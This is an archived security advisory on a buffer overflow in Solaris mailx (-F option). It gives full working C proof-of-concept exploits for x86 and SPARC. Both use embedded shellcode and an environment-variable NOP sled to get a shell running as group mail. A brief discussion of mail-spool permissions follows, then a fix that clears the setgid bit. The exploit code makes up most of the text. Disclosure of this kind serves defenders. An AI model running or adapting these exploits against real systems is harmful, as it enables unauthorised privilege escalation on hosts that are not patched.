Vulnerability
mailx
Affected
Solaris 2.5, 2.5.1, 2.6, 7, 8
Description
Pablo Sor found following. The mailx program is installed setgid
mail by default in Solaris, a buffer overrun exists in the -F
option, by specifying a long buffer containing machine executable
code, it is possible to execute arbitrary command as gid mail.
Exploit Code:
#include <fcntl.h>
/*
/usr/bin/mailx overflow proof of conecpt.
Pablo Sor, Buenos Aires, Argentina 04/2001
psor@afip.gov.ar, psor@ccc.uba.ar
works against x86 solaris 8
default offset should work.
usage:
bash$ id
uid=100(laika) gid=1(other)
bash$ ./mailx-exp
Subject: tomy
.
EOT
[wait...]
$ id
uid=100(laika) gid=1(other) egid=6(mail)
*/
long get_esp() { __asm__("movl %esp,%eax"); }
int main(int ac, char **av)
{
char shell[]=
"\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"
"\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"
"\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"
"\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"
"\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"
"\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"
"\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"
"\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"
"\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"
"\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78";
unsigned long magic = get_esp() + 2075; /* default offset */
unsigned char buf[1150];
char *envi;
envi = (char *)malloc(300*sizeof(char));
memset(envi,0x90,300);
memcpy(envi+280-strlen(shell),shell,strlen(shell));
memcpy(envi,"SOR=",4);
envi[299]=0;
putenv(envi);
symlink("/bin/ksh","/tmp/xx");
memset(buf,0x41,1150);
memcpy(buf+1116,&magic,4);
buf[1149]=0;
execl("/usr/bin/mailx","mailx","-F",buf,NULL);
}
Sparc code:
#include <fcntl.h>
/*
/usr/bin/mailx overflow proof of conecpt.
Pablo Sor, Buenos Aires, Argentina 05/2001
psor@afip.gov.ar, psor@ccc.uba.ar
works against Solaris 8 (SPARC)
default offset should work.
$ id
uid=100(laika) gid=1(other)
$ ./mailx-exp
Subject: tomy
.
EOT
[wait..]
$ id
uid=100(laika) gid=1(other) egid=6(mail)
*/
int main(int ac, char **av)
{
char shell[]=
"\x90\x10\x20\x06\x82\x10\x20\x88\x91\xd0\x20\x08" /* setegid(6) */
"\x90\x10\x20\x06\x82\x10\x20\x2e\x91\xd0\x20\x08" /* setgid(6) */
/* LSD-pl.net guys shellcode */
"\x90\x08\x3f\xff" /* and %g0,-1,%o0 */
"\x82\x10\x20\x17" /* mov 0x17,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x20\xbf\xff\xff" /* bn,a <shellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <shellcode> */
"\x7f\xff\xff\xff" /* call <shellcode+4> */
"\x90\x03\xe0\x20" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh";
u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
unsigned long magic = get_sp() + 1444 ; /* default offset */
unsigned char buf[1220];
char *envi;
int cont;
envi = (char *)malloc(1000*sizeof(char));
for (cont=3;cont<990;cont=cont+4)
{ envi[cont]= 0xa6;envi[cont+1]=0x1c;envi[cont+2]=0xc0;envi[cont+3]=0x13; }
for (cont=803;cont<803+strlen(shell);++cont) envi[cont]=shell[cont-803];
memcpy(envi,"SO=",3);
envi[999]=0;
putenv(envi);
memset(buf,0x41,1220);
memcpy(buf+1120+24,&magic,4); /* fake %fp */
memcpy(buf+1120+28,&magic,4); /* fake %i7 */
buf[1220]=0;
execl("/usr/bin/mailx","mailx","-F",buf,NULL);
}
set-gid has nothing to do with writing the inbox. It was in old
days (without todays 1000 permission) the only method to allow
mail clients the creation of .lock files and the inbox file itself
in /var/spool/mail. It was never necessary to let the inbox
writeable for group "mail" (of course, probably not true in very
old System 7 environments). Therefore, a 600 permission does NOT
implicate an unnecessary group mail setup. The delivery into a
mailbox is accomplished with user (inbox owner) permission
(derived from the set- uid root MTA).
V7 used setuid-root /bin/mail for delivery (it was insecure). A
correct implementation of SysV mail with setgid-mail does indeed
require that mailboxes be writable by the group mail. The system
mailbox spool directory must not be world writable. SysV mail is
designed to eliminate *ALL* need for setuid-root!
By now you might have realised that SysV mail requires chown() to
be usable by non-root. If so then you're right. It's not
compatible with naive filesystem-based quotas. Pick one: a) root
compromises, or b) quotas. Actually, you don't have to -- you
can implement mailbox quotas in the mail delivery agent and you
can put your mailbox directory on a separate filesystem such that
you don't have to use FS quotas there.
Solution
Clear the sgid bit of /usr/bin/mailx program. Sun Microsystems
was notified on April 18, 2001. Patches are excepted shortly.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
